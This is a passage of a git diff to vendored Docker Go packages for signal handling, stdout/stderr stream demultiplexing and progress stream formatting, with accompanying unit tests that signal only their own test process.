unix.SIGSEGV, + "STKFLT": unix.SIGSTKFLT, + "STOP": unix.SIGSTOP, + "SYS": unix.SIGSYS, + "TERM": unix.SIGTERM, + "TRAP": unix.SIGTRAP, + "TSTP": unix.SIGTSTP, + "TTIN": unix.SIGTTIN, + "TTOU": unix.SIGTTOU, + "URG": unix.SIGURG, + "USR1": unix.SIGUSR1, + "USR2": unix.SIGUSR2, + "VTALRM": unix.SIGVTALRM, + "WINCH": unix.SIGWINCH, + "XCPU": unix.SIGXCPU, + "XFSZ": unix.SIGXFSZ, "RTMIN": sigrtmin, "RTMIN+1": sigrtmin + 1, "RTMIN+2": sigrtmin + 2, diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go new 
file mode 100644 index 0000000000..9a021e2164 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go @@ -0,0 +1,59 @@ +// +build darwin linux + +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "os" + "syscall" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCatchAll(t *testing.T) { + sigs := make(chan os.Signal, 1) + CatchAll(sigs) + defer StopCatch(sigs) + + listOfSignals := map[string]string{ + "CONT": syscall.SIGCONT.String(), + "HUP": syscall.SIGHUP.String(), + "CHLD": syscall.SIGCHLD.String(), + "ILL": syscall.SIGILL.String(), + "FPE": syscall.SIGFPE.String(), + "CLD": syscall.SIGCLD.String(), + } + + for sigStr := range listOfSignals { + signal, ok := SignalMap[sigStr] + if ok { + go func() { + time.Sleep(1 * time.Millisecond) + syscall.Kill(syscall.Getpid(), signal) + }() + + s := <-sigs + assert.Check(t, is.Equal(s.String(), signal.String())) + } + + } +} + +func TestStopCatch(t *testing.T) { + signal := SignalMap["HUP"] + channel := make(chan os.Signal, 1) + CatchAll(channel) + go func() { + + time.Sleep(1 * time.Millisecond) + syscall.Kill(syscall.Getpid(), signal) + }() + signalString := <-channel + assert.Check(t, is.Equal(signalString.String(), signal.String())) + + StopCatch(channel) + _, ok := <-channel + assert.Check(t, is.Equal(ok, false)) +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go deleted file mode 100644 index 89576b9e3b..0000000000 --- a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go +++ /dev/null @@ -1,42 +0,0 @@ -package signal - -import ( - "syscall" -) - -// SignalMap is a map of Solaris signals. 
-// SIGINFO and SIGTHR not defined for Solaris -var SignalMap = map[string]syscall.Signal{ - "ABRT": syscall.SIGABRT, - "ALRM": syscall.SIGALRM, - "BUF": syscall.SIGBUS, - "CHLD": syscall.SIGCHLD, - "CONT": syscall.SIGCONT, - "EMT": syscall.SIGEMT, - "FPE": syscall.SIGFPE, - "HUP": syscall.SIGHUP, - "ILL": syscall.SIGILL, - "INT": syscall.SIGINT, - "IO": syscall.SIGIO, - "IOT": syscall.SIGIOT, - "KILL": syscall.SIGKILL, - "LWP": syscall.SIGLWP, - "PIPE": syscall.SIGPIPE, - "PROF": syscall.SIGPROF, - "QUIT": syscall.SIGQUIT, - "SEGV": syscall.SIGSEGV, - "STOP": syscall.SIGSTOP, - "SYS": syscall.SIGSYS, - "TERM": syscall.SIGTERM, - "TRAP": syscall.SIGTRAP, - "TSTP": syscall.SIGTSTP, - "TTIN": syscall.SIGTTIN, - "TTOU": syscall.SIGTTOU, - "URG": syscall.SIGURG, - "USR1": syscall.SIGUSR1, - "USR2": syscall.SIGUSR2, - "VTALRM": syscall.SIGVTALRM, - "WINCH": syscall.SIGWINCH, - "XCPU": syscall.SIGXCPU, - "XFSZ": syscall.SIGXFSZ, -} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_test.go new file mode 100644 index 0000000000..0bfcf6ce44 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_test.go @@ -0,0 +1,34 @@ +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "syscall" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseSignal(t *testing.T) { + _, checkAtoiError := ParseSignal("0") + assert.Check(t, is.Error(checkAtoiError, "Invalid signal: 0")) + + _, error := ParseSignal("SIG") + assert.Check(t, is.Error(error, "Invalid signal: SIG")) + + for sigStr := range SignalMap { + responseSignal, error := ParseSignal(sigStr) + assert.Check(t, error) + signal := SignalMap[sigStr] + assert.Check(t, is.DeepEqual(signal, responseSignal)) + } +} + +func TestValidSignalForPlatform(t *testing.T) { + isValidSignal := ValidSignalForPlatform(syscall.Signal(0)) + assert.Check(t, is.Equal(false, isValidSignal)) + + for _, sigN := 
range SignalMap { + isValidSignal = ValidSignalForPlatform(syscall.Signal(sigN)) + assert.Check(t, is.Equal(true, isValidSignal)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go index 5d058fd56b..a2aa4248fa 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go @@ -1,6 +1,6 @@ // +build !windows -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go index c592d37dfe..1fd25a83c6 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!darwin,!freebsd,!windows,!solaris +// +build !linux,!darwin,!freebsd,!windows -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go index 440f2700e2..65752f24aa 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go new file mode 100644 index 0000000000..e56854c7c3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go @@ -0,0 +1,43 @@ +package main + +import ( + "os" + "syscall" + "time" + + "github.com/docker/docker/pkg/signal" + "github.com/sirupsen/logrus" +) + +func main() { + sigmap := 
map[string]os.Signal{ + "TERM": syscall.SIGTERM, + "QUIT": syscall.SIGQUIT, + "INT": os.Interrupt, + } + signal.Trap(func() { + time.Sleep(time.Second) + os.Exit(99) + }, logrus.StandardLogger()) + go func() { + p, err := os.FindProcess(os.Getpid()) + if err != nil { + panic(err) + } + s := os.Getenv("SIGNAL_TYPE") + multiple := os.Getenv("IF_MULTIPLE") + switch s { + case "TERM", "INT": + if multiple == "1" { + for { + p.Signal(sigmap[s]) + } + } else { + p.Signal(sigmap[s]) + } + case "QUIT": + p.Signal(sigmap[s]) + } + }() + time.Sleep(2 * time.Second) +} diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go index 638a1ab66c..2a6e69fb50 100644 --- a/vendor/github.com/docker/docker/pkg/signal/trap.go +++ b/vendor/github.com/docker/docker/pkg/signal/trap.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "fmt" @@ -11,7 +11,6 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/pkg/errors" ) @@ -27,7 +26,9 @@ import ( // the docker daemon is not restarted and also running under systemd. 
// Fixes https://github.com/docker/docker/issues/19728 // -func Trap(cleanup func()) { +func Trap(cleanup func(), logger interface { + Info(args ...interface{}) +}) { c := make(chan os.Signal, 1) // we will handle INT, TERM, QUIT, SIGPIPE here signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE} @@ -40,7 +41,7 @@ func Trap(cleanup func()) { } go func(sig os.Signal) { - logrus.Infof("Processing signal '%v'", sig) + logger.Info(fmt.Sprintf("Processing signal '%v'", sig)) switch sig { case os.Interrupt, syscall.SIGTERM: if atomic.LoadUint32(&interruptCount) < 3 { @@ -54,11 +55,11 @@ func Trap(cleanup func()) { } } else { // 3 SIGTERM/INT signals received; force exit without cleanup - logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") + logger.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") } case syscall.SIGQUIT: DumpStacks("") - logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") + logger.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") } //for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal # os.Exit(128 + int(sig.(syscall.Signal))) diff --git a/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go new file mode 100644 index 0000000000..14d1543117 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go @@ -0,0 +1,82 @@ +// +build linux + +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "syscall" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func buildTestBinary(t *testing.T, tmpdir string, prefix string) (string, string) { + tmpDir, err := ioutil.TempDir(tmpdir, prefix) + assert.NilError(t, err) + exePath := tmpDir + "/" + prefix + wd, _ := os.Getwd() + testHelperCode := wd + "/testfiles/main.go" + cmd := 
exec.Command("go", "build", "-o", exePath, testHelperCode) + err = cmd.Run() + assert.NilError(t, err) + return exePath, tmpDir +} + +func TestTrap(t *testing.T) { + var sigmap = []struct { + name string + signal os.Signal + multiple bool + }{ + {"TERM", syscall.SIGTERM, false}, + {"QUIT", syscall.SIGQUIT, true}, + {"INT", os.Interrupt, false}, + {"TERM", syscall.SIGTERM, true}, + {"INT", os.Interrupt, true}, + } + exePath, tmpDir := buildTestBinary(t, "", "main") + defer os.RemoveAll(tmpDir) + + for _, v := range sigmap { + cmd := exec.Command(exePath) + cmd.Env = append(os.Environ(), fmt.Sprintf("SIGNAL_TYPE=%s", v.name)) + if v.multiple { + cmd.Env = append(cmd.Env, "IF_MULTIPLE=1") + } + err := cmd.Start() + assert.NilError(t, err) + err = cmd.Wait() + if e, ok := err.(*exec.ExitError); ok { + code := e.Sys().(syscall.WaitStatus).ExitStatus() + if v.multiple { + assert.Check(t, is.DeepEqual(128+int(v.signal.(syscall.Signal)), code)) + } else { + assert.Check(t, is.Equal(99, code)) + } + continue + } + t.Fatal("process didn't end with any error") + } + +} + +func TestDumpStacks(t *testing.T) { + directory, err := ioutil.TempDir("", "test-dump-tasks") + assert.Check(t, err) + defer os.RemoveAll(directory) + dumpPath, err := DumpStacks(directory) + assert.Check(t, err) + readFile, _ := ioutil.ReadFile(dumpPath) + fileData := string(readFile) + assert.Check(t, is.Contains(fileData, "goroutine")) +} + +func TestDumpStacksWithEmptyInput(t *testing.T) { + path, err := DumpStacks("") + assert.Check(t, err) + assert.Check(t, is.Equal(os.Stderr.Name(), path)) +} diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go index be20765457..8f6e0a737a 100644 --- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go @@ -1,4 +1,4 @@ -package stdcopy +package stdcopy // import "github.com/docker/docker/pkg/stdcopy" import ( "bytes" @@ -20,6 +20,9 @@ 
const ( Stdout // Stderr represents standard error steam type. Stderr + // Systemerr represents errors originating from the system that make it + // into the multiplexed stream. + Systemerr stdWriterPrefixLen = 8 stdWriterFdIndex = 0 @@ -115,8 +118,9 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) } } + stream := StdType(buf[stdWriterFdIndex]) // Check the first byte to know where to write - switch StdType(buf[stdWriterFdIndex]) { + switch stream { case Stdin: fallthrough case Stdout: @@ -125,6 +129,11 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) case Stderr: // Write on stderr out = dsterr + case Systemerr: + // If we're on Systemerr, we won't write anywhere. + // NB: if this code changes later, make sure you don't try to write + // to outstream if Systemerr is the stream + out = nil default: return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex]) } @@ -155,11 +164,18 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) } } + // we might have an error from the source mixed up in our multiplexed + // stream. if we do, return it. 
+ if stream == Systemerr { + return written, fmt.Errorf("error from daemon in stream: %s", string(buf[stdWriterPrefixLen:frameSize+stdWriterPrefixLen])) + } + // Write the retrieved frame (without header) nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen]) if ew != nil { return 0, ew } + // If the frame has not been fully written: error if nw != frameSize { return 0, io.ErrShortWrite diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go index 3137a75239..63edb855e5 100644 --- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go @@ -1,4 +1,4 @@ -package stdcopy +package stdcopy // import "github.com/docker/docker/pkg/stdcopy" import ( "bytes" @@ -16,14 +16,14 @@ func TestNewStdWriter(t *testing.T) { } } -func TestWriteWithUnitializedStdWriter(t *testing.T) { +func TestWriteWithUninitializedStdWriter(t *testing.T) { writer := stdWriter{ Writer: nil, prefix: byte(Stdout), } n, err := writer.Write([]byte("Something here")) if n != 0 || err == nil { - t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter") + t.Fatalf("Should fail when given an incomplete or uninitialized StdWriter") } } @@ -246,6 +246,35 @@ func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) { } } +// TestStdCopyReturnsErrorFromSystem tests that StdCopy correctly returns an +// error, when that error is muxed into the Systemerr stream. 
+func TestStdCopyReturnsErrorFromSystem(t *testing.T) { + // write in the basic messages, just so there's some fluff in there + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + // add in an error message on the Systemerr stream + systemErrBytes := []byte(strings.Repeat("S", startingBufLen)) + systemWriter := NewStdWriter(buffer, Systemerr) + _, err = systemWriter.Write(systemErrBytes) + if err != nil { + t.Fatal(err) + } + + // now copy and demux. we should expect an error containing the string we + // wrote out + _, err = StdCopy(ioutil.Discard, ioutil.Discard, buffer) + if err == nil { + t.Fatal("expected error, got none") + } + if !strings.Contains(err.Error(), string(systemErrBytes)) { + t.Fatal("expected error to contain message") + } +} + func BenchmarkWrite(b *testing.B) { w := NewStdWriter(ioutil.Discard, Stdout) data := []byte("Test line for testing stdwriter performance\n") diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go index ce6ea79dee..2b5e713040 100644 --- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go @@ -1,5 +1,5 @@ // Package streamformatter provides helper functions to format a stream. -package streamformatter +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" import ( "encoding/json" @@ -10,91 +10,76 @@ import ( "github.com/docker/docker/pkg/progress" ) -// StreamFormatter formats a stream, optionally using JSON. 
-type StreamFormatter struct { - json bool -} - -// NewStreamFormatter returns a simple StreamFormatter -func NewStreamFormatter() *StreamFormatter { - return &StreamFormatter{} -} - -// NewJSONStreamFormatter returns a StreamFormatter configured to stream json -func NewJSONStreamFormatter() *StreamFormatter { - return &StreamFormatter{true} -} - const streamNewline = "\r\n" -var streamNewlineBytes = []byte(streamNewline) +type jsonProgressFormatter struct{} -// FormatStream formats the specified stream. -func (sf *StreamFormatter) FormatStream(str string) []byte { - if sf.json { - b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str}) - if err != nil { - return sf.FormatError(err) - } - return append(b, streamNewlineBytes...) - } - return []byte(str + "\r") +func appendNewline(source []byte) []byte { + return append(source, []byte(streamNewline)...) } // FormatStatus formats the specified objects according to the specified format (and id). -func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte { +func FormatStatus(id, format string, a ...interface{}) []byte { str := fmt.Sprintf(format, a...) - if sf.json { - b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) - if err != nil { - return sf.FormatError(err) - } - return append(b, streamNewlineBytes...) + b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) + if err != nil { + return FormatError(err) } - return []byte(str + streamNewline) + return appendNewline(b) } -// FormatError formats the specified error. -func (sf *StreamFormatter) FormatError(err error) []byte { - if sf.json { - jsonError, ok := err.(*jsonmessage.JSONError) - if !ok { - jsonError = &jsonmessage.JSONError{Message: err.Error()} - } - if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { - return append(b, streamNewlineBytes...) 
- } - return []byte("{\"error\":\"format error\"}" + streamNewline) +// FormatError formats the error as a JSON object +func FormatError(err error) []byte { + jsonError, ok := err.(*jsonmessage.JSONError) + if !ok { + jsonError = &jsonmessage.JSONError{Message: err.Error()} } - return []byte("Error: " + err.Error() + streamNewline) + if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { + return appendNewline(b) + } + return []byte(`{"error":"format error"}` + streamNewline) +} + +func (sf *jsonProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte { + return FormatStatus(id, format, a...) } -// FormatProgress formats the progress information for a specified action. -func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { +// formatProgress formats the progress information for a specified action. +func (sf *jsonProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { if progress == nil { progress = &jsonmessage.JSONProgress{} } - if sf.json { - var auxJSON *json.RawMessage - if aux != nil { - auxJSONBytes, err := json.Marshal(aux) - if err != nil { - return nil - } - auxJSON = new(json.RawMessage) - *auxJSON = auxJSONBytes - } - b, err := json.Marshal(&jsonmessage.JSONMessage{ - Status: action, - ProgressMessage: progress.String(), - Progress: progress, - ID: id, - Aux: auxJSON, - }) + var auxJSON *json.RawMessage + if aux != nil { + auxJSONBytes, err := json.Marshal(aux) if err != nil { return nil } - return append(b, streamNewlineBytes...) 
+ auxJSON = new(json.RawMessage) + *auxJSON = auxJSONBytes + } + b, err := json.Marshal(&jsonmessage.JSONMessage{ + Status: action, + ProgressMessage: progress.String(), + Progress: progress, + ID: id, + Aux: auxJSON, + }) + if err != nil { + return nil + } + return appendNewline(b) +} + +type rawProgressFormatter struct{} + +func (sf *rawProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte { + return []byte(fmt.Sprintf(format, a...) + streamNewline) +} + +func (sf *rawProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { + if progress == nil { + progress = &jsonmessage.JSONProgress{} } endl := "\r" if progress.String() == "" { @@ -105,16 +90,23 @@ func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessa // NewProgressOutput returns a progress.Output object that can be passed to // progress.NewProgressReader. -func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output { - return &progressOutput{ - sf: sf, - out: out, - newLines: newLines, - } +func NewProgressOutput(out io.Writer) progress.Output { + return &progressOutput{sf: &rawProgressFormatter{}, out: out, newLines: true} +} + +// NewJSONProgressOutput returns a progress.Output that that formats output +// using JSON objects +func NewJSONProgressOutput(out io.Writer, newLines bool) progress.Output { + return &progressOutput{sf: &jsonProgressFormatter{}, out: out, newLines: newLines} +} + +type formatProgress interface { + formatStatus(id, format string, a ...interface{}) []byte + formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte } type progressOutput struct { - sf *StreamFormatter + sf formatProgress out io.Writer newLines bool } @@ -123,10 +115,10 @@ type progressOutput struct { func (out *progressOutput) WriteProgress(prog progress.Progress) error { var formatted []byte if prog.Message != "" { - formatted = 
out.sf.FormatStatus(prog.ID, prog.Message) + formatted = out.sf.formatStatus(prog.ID, prog.Message) } else { - jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total} - formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) + jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total, HideCounts: prog.HideCounts, Units: prog.Units} + formatted = out.sf.formatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) } _, err := out.out.Write(formatted) if err != nil { @@ -134,39 +126,34 @@ func (out *progressOutput) WriteProgress(prog progress.Progress) error { } if out.newLines && prog.LastUpdate { - _, err = out.out.Write(out.sf.FormatStatus("", "")) + _, err = out.out.Write(out.sf.formatStatus("", "")) return err } return nil } -// StdoutFormatter is a streamFormatter that writes to the standard output. -type StdoutFormatter struct { +// AuxFormatter is a streamFormatter that writes aux progress messages +type AuxFormatter struct { io.Writer - *StreamFormatter } -func (sf *StdoutFormatter) Write(buf []byte) (int, error) { - formattedBuf := sf.StreamFormatter.FormatStream(string(buf)) - n, err := sf.Writer.Write(formattedBuf) - if n != len(formattedBuf) { - return n, io.ErrShortWrite +// Emit emits the given interface as an aux progress message +func (sf *AuxFormatter) Emit(aux interface{}) error { + auxJSONBytes, err := json.Marshal(aux) + if err != nil { + return err } - return len(buf), err -} - -// StderrFormatter is a streamFormatter that writes to the standard error. 
-type StderrFormatter struct { - io.Writer - *StreamFormatter -} - -func (sf *StderrFormatter) Write(buf []byte) (int, error) { - formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m") - n, err := sf.Writer.Write(formattedBuf) - if n != len(formattedBuf) { - return n, io.ErrShortWrite + auxJSON := new(json.RawMessage) + *auxJSON = auxJSONBytes + msgJSON, err := json.Marshal(&jsonmessage.JSONMessage{Aux: auxJSON}) + if err != nil { + return err + } + msgJSON = appendNewline(msgJSON) + n, err := sf.Writer.Write(msgJSON) + if n != len(msgJSON) { + return io.ErrShortWrite } - return len(buf), err + return err } diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go index 93ec90f5f7..4399a6509b 100644 --- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go @@ -1,108 +1,112 @@ -package streamformatter +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" import ( + "bytes" "encoding/json" "errors" - "reflect" "strings" "testing" "github.com/docker/docker/pkg/jsonmessage" + "github.com/google/go-cmp/cmp" + "github.com/google/go-cmp/cmp/cmpopts" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestFormatStream(t *testing.T) { - sf := NewStreamFormatter() - res := sf.FormatStream("stream") - if string(res) != "stream"+"\r" { - t.Fatalf("%q", res) - } -} - -func TestFormatJSONStatus(t *testing.T) { - sf := NewStreamFormatter() - res := sf.FormatStatus("ID", "%s%d", "a", 1) - if string(res) != "a1\r\n" { - t.Fatalf("%q", res) - } +func TestRawProgressFormatterFormatStatus(t *testing.T) { + sf := rawProgressFormatter{} + res := sf.formatStatus("ID", "%s%d", "a", 1) + assert.Check(t, is.Equal("a1\r\n", string(res))) } -func TestFormatSimpleError(t *testing.T) { - sf := NewStreamFormatter() 
- res := sf.FormatError(errors.New("Error for formatter")) - if string(res) != "Error: Error for formatter\r\n" { - t.Fatalf("%q", res) - } -} - -func TestJSONFormatStream(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatStream("stream") - if string(res) != `{"stream":"stream"}`+"\r\n" { - t.Fatalf("%q", res) +func TestRawProgressFormatterFormatProgress(t *testing.T) { + sf := rawProgressFormatter{} + jsonProgress := &jsonmessage.JSONProgress{ + Current: 15, + Total: 30, + Start: 1, } + res := sf.formatProgress("id", "action", jsonProgress, nil) + out := string(res) + assert.Check(t, strings.HasPrefix(out, "action [====")) + assert.Check(t, is.Contains(out, "15B/30B")) + assert.Check(t, strings.HasSuffix(out, "\r")) } -func TestJSONFormatStatus(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatStatus("ID", "%s%d", "a", 1) - if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" { - t.Fatalf("%q", res) - } +func TestFormatStatus(t *testing.T) { + res := FormatStatus("ID", "%s%d", "a", 1) + expected := `{"status":"a1","id":"ID"}` + streamNewline + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatSimpleError(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatError(errors.New("Error for formatter")) - if string(res) != `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}`+"\r\n" { - t.Fatalf("%q", res) - } +func TestFormatError(t *testing.T) { + res := FormatError(errors.New("Error for formatter")) + expected := `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}` + "\r\n" + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatJSONError(t *testing.T) { - sf := NewJSONStreamFormatter() +func TestFormatJSONError(t *testing.T) { err := &jsonmessage.JSONError{Code: 50, Message: "Json error"} - res := sf.FormatError(err) - if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" { - 
t.Fatalf("%q", res) - } + res := FormatError(err) + expected := `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}` + streamNewline + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatProgress(t *testing.T) { - sf := NewJSONStreamFormatter() - progress := &jsonmessage.JSONProgress{ +func TestJsonProgressFormatterFormatProgress(t *testing.T) { + sf := &jsonProgressFormatter{} + jsonProgress := &jsonmessage.JSONProgress{ Current: 15, Total: 30, Start: 1, } - res := sf.FormatProgress("id", "action", progress, nil) + aux := "aux message" + res := sf.formatProgress("id", "action", jsonProgress, aux) msg := &jsonmessage.JSONMessage{} - if err := json.Unmarshal(res, msg); err != nil { - t.Fatal(err) + + assert.NilError(t, json.Unmarshal(res, msg)) + + rawAux := json.RawMessage(`"` + aux + `"`) + expected := &jsonmessage.JSONMessage{ + ID: "id", + Status: "action", + Aux: &rawAux, + Progress: jsonProgress, } - if msg.ID != "id" { - t.Fatalf("ID must be 'id', got: %s", msg.ID) + assert.DeepEqual(t, msg, expected, cmpJSONMessageOpt()) +} + +func cmpJSONMessageOpt() cmp.Option { + progressMessagePath := func(path cmp.Path) bool { + return path.String() == "ProgressMessage" } - if msg.Status != "action" { - t.Fatalf("Status must be 'action', got: %s", msg.Status) + return cmp.Options{ + cmpopts.IgnoreUnexported(jsonmessage.JSONProgress{}), + // Ignore deprecated property that is a derivative of Progress + cmp.FilterPath(progressMessagePath, cmp.Ignore()), } +} - // The progress will always be in the format of: - // [=========================> ] 15 B/30 B 404933h7m11s - // The last entry '404933h7m11s' is the timeLeftBox. - // However, the timeLeftBox field may change as progress.String() depends on time.Now(). - // Therefore, we have to strip the timeLeftBox from the strings to do the comparison. 
+func TestJsonProgressFormatterFormatStatus(t *testing.T) { + sf := jsonProgressFormatter{} + res := sf.formatStatus("ID", "%s%d", "a", 1) + assert.Check(t, is.Equal(`{"status":"a1","id":"ID"}`+streamNewline, string(res))) +} - // Compare the progress strings before the timeLeftBox - expectedProgress := "[=========================> ] 15 B/30 B" - // if terminal column is <= 110, expectedProgressShort is expected. - expectedProgressShort := " 15 B/30 B" - if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) || - strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) { - t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s", - expectedProgress, expectedProgressShort, msg.ProgressMessage) - } +func TestNewJSONProgressOutput(t *testing.T) { + b := bytes.Buffer{} + b.Write(FormatStatus("id", "Downloading")) + _ = NewJSONProgressOutput(&b, false) + assert.Check(t, is.Equal(`{"status":"Downloading","id":"id"}`+streamNewline, b.String())) +} - if !reflect.DeepEqual(msg.Progress, progress) { - t.Fatal("Original progress not equals progress from FormatProgress") - } +func TestAuxFormatterEmit(t *testing.T) { + b := bytes.Buffer{} + aux := &AuxFormatter{Writer: &b} + sampleAux := &struct { + Data string + }{"Additional data"} + err := aux.Emit(sampleAux) + assert.NilError(t, err) + assert.Check(t, is.Equal(`{"aux":{"Data":"Additional data"}}`+streamNewline, b.String())) } diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go new file mode 100644 index 0000000000..1473ed974a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go @@ -0,0 +1,47 @@ +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/pkg/jsonmessage" +) + +type streamWriter struct { + io.Writer + lineFormat func([]byte) string +} + +func (sw 
